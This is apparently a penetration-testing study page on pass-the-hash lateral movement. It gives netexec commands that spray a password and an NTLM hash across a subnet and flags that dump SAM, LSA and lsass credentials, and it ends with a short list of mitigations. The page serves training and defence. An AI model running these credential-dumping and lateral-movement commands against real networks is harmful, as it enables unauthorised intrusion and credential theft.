search

Pass the Hash

hashtag
Overview

With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network.

If the password/hash is one of a Local Administrator, we can use secretsdump to dump out more hashes from other computers, crack those passwords and pass them around again.

Netexec is the tool that will be used for this attack and it even stores a database of all the findings of the attack.

hashtag
Netexec

Pass the Password

netexec smb 192.168.1.0/24 -u greg -d PNPT.local -p Password1

Pass the Hash

netexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404e' --local-auth

Pass the Hash Variations

--sam        Dumps SAM 
--shares     Dumps shares being offered by the machine
--lsa        Dumps LSA hashes (cached credentials)
-M lsassy    Dumps lsassy (recent user logins)

View crackmapexec database

nxcdb
LogoDatabase General Usage | NetExecwww.netexec.wikichevron-right

hashtag
Mitigation

  • Limit account reuse

  • Don't reuse Local Administrator passwords

  • Disable Local Administrator and Guest accounts

  • Limit who is an Administrator

  • Strong password policy

PreviousDCOMNextPass the Ticket